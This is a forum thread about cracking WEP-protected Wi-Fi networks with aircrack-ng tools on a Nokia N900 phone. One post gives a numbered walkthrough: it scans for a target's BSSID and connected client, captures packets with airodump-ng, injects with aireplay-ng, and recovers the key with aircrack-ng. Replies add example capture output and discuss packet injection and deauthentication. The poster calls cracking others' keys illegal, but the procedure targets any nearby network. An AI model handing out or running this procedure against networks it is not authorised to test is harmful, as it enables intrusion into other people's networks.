Re: N900 WEP cracking / Backtrack 3
 

Hi q6600

can you please share with us how did you get aircrack to crack a wep-network, step by step. Thanks

Re: N900 WEP cracking / Backtrack 3
 

hi this will work only if a client is conected on the network.
your bluethoot must be off
1- nokia n900 with prm 1.2
2-update your krenel to power krenel from dl sistem ( reboot )
2-instll aircrack-ng
3-install rootsh
4- oper xterminal type root and enter
5-airodump-ng wlan0 ( put on a paper bssid, station and chanel ) when you have this presc ctr+c
6-in the same window
airodump-ng -w wep -c [channel number] --bssid [bssid number] [wireless card name]
7-open a new xterminal windo type root and enter
8-aireplay-ng -1 0 -a [bssid] [wireless card name]
9-open the 3 rd windo type root and enter
aireplay-ng -3 -b [bssid] [wireless card name]
10- go on window 1 and wait til you got 50.000 data pack
11-when you have 50.000 data pack prec ctr+c ( in all windows)
12-go on 3 rd window and type
cd /root
ls
and now looke for a file with .cap (ezxtention .cap)
13-aircrack-ng [filename].cap and you will have your wep key
14- if you need space in root delete the.cap files.
cd /root
rm (name of the file)
example rm wep-01.cap
please note that is ilegale to crack wep keys ( play wit your roouter )
let me know if you manage to do it.

Re: N900 WEP cracking / Backtrack 3
 

N900 wifi driver is not capable of packet injection. So waiting for the packets is going to take a while. You cannot use aireplay to inject packets.

Re: N900 WEP cracking / Backtrack 3
 

like this laughingstok sad injection is not working sao you can skip that step with aireplay.
what i did i put my laptop to dl a masive file to have trafic.

Re: N900 WEP cracking / Backtrack 3
 

can you use aireplay to do a Deauthentication foa a handshake with n900? or you ahve to be lucky to cach one?

Re: N900 WEP cracking / Backtrack 3
 

@ q6600 thanks for the step by step guide.. This by far seems to be only guide that is out there for N900...

Although I have couple questions. what exactly is [wireless card name] is referring to? and also on the 5th step, you sad to put down station# and it looks like you never used the station# again. Could you please identify the difference between bssid and station. Thanks.

Re: N900 WEP cracking / Backtrack 3
 

hi i bought my n900 yesterday. well if i wanted to make the injection working , what would i have to do? i have the time and the willing .i have some fundamendal programming skills (c++) a bit of networking . where should i start?

Re: N900 WEP cracking / Backtrack 3
 

@suphiceto
for n900 the name of the wirles card is wlan0
example: airodump-ng wlan0
you need a bssid and a station ( the router and the pc conected to the router) if you dont have a pc conected you will not be able to capute data pack)
this is a example
CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782

first is the router and station is the pc conected to taht router. ( at the moment the injection is not working, and you need a pc conected )

Re: N900 WEP cracking / Backtrack 3
 

The injection isn't possible atm. Use the Tita-Kernel version <26 and you can scan other channels than only #6.
The Backtrack-mobile Team is working on the injection.

German readers can continue here.

Re: N900 WEP cracking / Backtrack 3
 

It seems they managed http://www.youtube.com/watch?v=IXfGGOa-skA I really want to know how they did it! Does anybody know?